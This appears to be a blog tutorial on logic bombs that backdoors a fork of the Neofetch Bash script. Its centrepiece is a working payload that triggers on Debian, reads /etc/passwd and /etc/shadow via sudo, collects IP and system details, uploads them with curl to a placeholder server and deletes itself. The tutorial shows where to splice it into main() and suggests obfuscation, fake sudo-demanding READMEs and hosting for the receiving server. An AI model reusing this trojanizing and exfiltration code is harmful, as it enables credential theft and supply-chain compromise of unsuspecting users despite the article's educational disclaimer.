Logic bombs, or time bombs, are malicious scripts that can be activated under certain circumstances. Specifically, these circumstances can include specific dates or times, as well as particular actions.
Moreover, it is relatively easy to deploy and write logic bombs because you don’t need to deal with self-replication or complex malware behaviors.
So, this brings us to the question: How do hackers deploy their logic bombs? There are many methods, of course; however, in this article, I want to examine how to edit the source code of legitimate applications to create a logic bomb.
1.0 What is Exactly a Logic Bomb?
Casual explanation: A logic bomb can be a single line of malicious code or consist of 10 to 20 lines, or even more. In essence, it is designed to trigger under specific conditions (like an if-else statement) to harm systems.
Technical, more detailed explanation: A logic bomb is a type of malicious code that is designed to execute under specific conditions or triggers. In contrast to traditional malware that may spread autonomously, logic bombs remain dormant until certain criteria are met, such as a particular date, time, or user action. Once activated, they can perform a variety of harmful actions, including deleting files, corrupting data, or compromising system security.
1.1 Historical Events
There are a lot of cases of logic bombs, but let’s examine some recent events that occurred successfully.
On July 19, 2019, David Tinley, a contract employee, pleaded guilty to programming logic bombs in software for Siemens Corporation, causing it to malfunction after a set period. The bombs went undetected for two years until discovered when he was away.
In 2023, researchers found that some Newag trains were secretly programmed to break down after a certain distance or during maintenance, particularly when near rival workshops for repairs.
2.0 Mechanism of Logic Bombs
The mechanism of a logic bomb revolves around its ability to execute malicious actions based on specific triggers or conditions.
Time-Based Triggers: Logic bombs can activate on a specific date or time, such as an anniversary or after a set period since installation. For example, a logic bomb might be programmed to trigger on New Year’s Day.
Event-Based Triggers: Additionally, they can be triggered by user or system actions, such as opening a file, logging in, or reaching a transaction limit. Consequently, these actions can lead to unexpected behavior in the system.
Conditional Statements: Furthermore, logic bombs often use conditional statements (like if-else) to determine activation. They execute when a variable meets a specific value or condition. Thus, the logic bomb remains dormant until the right circumstances arise.
In this article, our goal is to add simple malicious code that will trigger when the Linux distribution is Debian inside an open-source GitHub repository.
3.0 Let’s Find an Open Source Github Repository
I want to use the Neofetch repository for this purpose. Fortunately, it has an MIT license, which allows us to modify the code and demonstrate our findings without worry. As a result, we can proceed with our demonstration while adhering to the licensing terms.
However, it’s important to emphasise once again that deploying malicious software is illegal; therefore, this operation is solely for educational purposes.
Furthermore, the main Neofetch Bash script contains more than 11,000 lines of code, which makes it easy to hide our logic bomb within it.
4.0 Writing a Malicious Script
Let’s start writing the malicious script that we will integrate into the Neofetch script later. Our Bash script will create a file that contains information about victim’s system and send this file to our server.
logic() {
[[ $distro ]] && return
if [[ -f /etc/os-release ]]; then
source /etc/os-release
if [[ $ID == "debian" ]]; then
distro="Debian ${VERSION_ID:-${VERSION}}"
malicious
fi
fi
}
malicious() {
sudo bash -c 'cat /etc/passwd > /tmp/xyz1048udk && \
echo "" >> /tmp/xyz1048udk && \
cat /etc/shadow >> /tmp/xyz1048udk && \
echo "" >> /tmp/xyz1048udk && \
echo "Local IP Address(es):" >> /tmp/xyz1048udk && \
hostname -I >> /tmp/xyz1048udk && \
echo "" >> /tmp/xyz1048udk && \
echo "Public IP Address:" >> /tmp/xyz1048udk && \
curl -s ifconfig.me >> /tmp/xyz1048udk && \
echo "" >> /tmp/xyz1048udk && \
echo "System Information:" >> /tmp/xyz1048udk && \
echo "Operating System:" >> /tmp/xyz1048udk && \
lsb_release -d >> /tmp/xyz1048udk && \
echo "Kernel Version:" >> /tmp/xyz1048udk && \
uname -r >> /tmp/xyz1048udk && \
echo "Disk Usage:" >> /tmp/xyz1048udk && \
df -h >> /tmp/xyz1048udk'
curl -X POST -F "file=@/tmp/xyz1048udk" https://hostname/upload_endpoint
sudo rm /tmp/xyz1048udk
sudo rm -- "$0"
}Our focus is not on gathering too much sensitive information here; rather, we are simply demonstrating how logic bombs trigger, which is sufficient for this demonstration. In this way, we aim to provide a clear understanding of their functionality without delving into unnecessary complexities.
To allow file transfer, you will need the public IP address of the web server and the upload endpoint URL (e.g., https://hostname/upload_endpoint).
To create a server for testing, you can use several platforms. Heroku allows you to deploy applications easily with a free account. Glitch lets you create and host web applications online with minimal setup.
#!/bin/bash
python3 script.py
ruby script.rbAdditionally, if you prefer another language, you can easily create a new file (such as Ruby or Python) and run that file within the Neofetch Bash script.
5.0 Editing Original Source Code And Testing
You can find the malicious repository that I forked on this GitHub page, where I added our Bash script in the middle of the Neofetch file.
main() {
cache_uname
get_os
# Our logic bomb here!!
logic
# Load default config.
eval "$config"
get_args "$@"
[[ $verbose != on ]] && exec 2>/dev/null
get_simple "$@"
get_distro
get_bold
get_distro_ascii
[[ $stdout == on ]] && stdout
# Minix doesn't support these sequences.
[[ $TERM != minix && $stdout != on ]] && {
# If the script exits for any reason, unhide the cursor.
trap 'printf "\e[?25h\e[?7h"' EXIT
# Hide the cursor and disable line wrap.
printf '\e[?25l\e[?7l'
}
image_backend
get_cache_dir
old_functions
print_info
dynamic_prompt
# w3m-img: Draw the image a second time to fix
# rendering issues in specific terminal emulators.
[[ $image_backend == *w3m* ]] && display_image
[[ $image_backend == *ueberzug* ]] && display_image
# Add neofetch info to verbose output.
err "Neofetch command: $0 $*"
err "Neofetch version: $version"
[[ $verbose == on ]] && printf '%b\033[m' "$err" >&2
# If `--loop` was used, constantly redraw the image.
while [[ $image_loop == on && $image_backend == w3m ]]; do
display_image
sleep 1
done
return 0
}
main "$@"To test the script, you can clone the repository in a virtual machine. First, make sure to edit the hostname and upload_endpoint. Then, run the command sudo ./neofetch inside the cloned folder.
6.0 Simulating Real Life
Normally, Neofetch doesn’t require any sudo or password to perform its operations, making it easy to notice our malicious script. Additionally, we haven’t added a default hostname to enhance safety, therefore, if someone accidentally uses this script on their personal system, it won’t harm anything.
However, a malicious actor won’t take the same safety measures that we do, so I want to discuss how a hacker can hide their malicious script and perform it.
- To make it hard to analyze, a hacker can separate code parts within the entire code. For instance, they might give these parts random names (or legitimate names) and remove all comments. As a result, this obfuscation makes it more challenging for others to understand the code’s true purpose.
- Hacker can fake README file, such as one that says ‘Run in sudo mode to execute the script’. Some people might fall for it.
- Some individuals may use ‘sudo curl’ to download a script that could grant access for executing commands with elevated privileges.
- In addition, bypassing sudo is an option for hackers, as they may exploit vulnerabilities or misconfigurations to enable this logic bomb to function, although Linux has fewer vulnerabilities than Windows.
And so on, there are many things a hacker can do. However, our focus today is not on creating a fully enhanced logic bomb; rather, our goal is to demonstrate how they operate.
I hope you enjoyed this post! If you have any feedback, please feel free to contact me; I’m open to developing this article further.
Ultimately, everything in this article is for educational purposes; consequently, we are not responsible for any harm caused, deploying and using malware without permission is illegal and unethical.
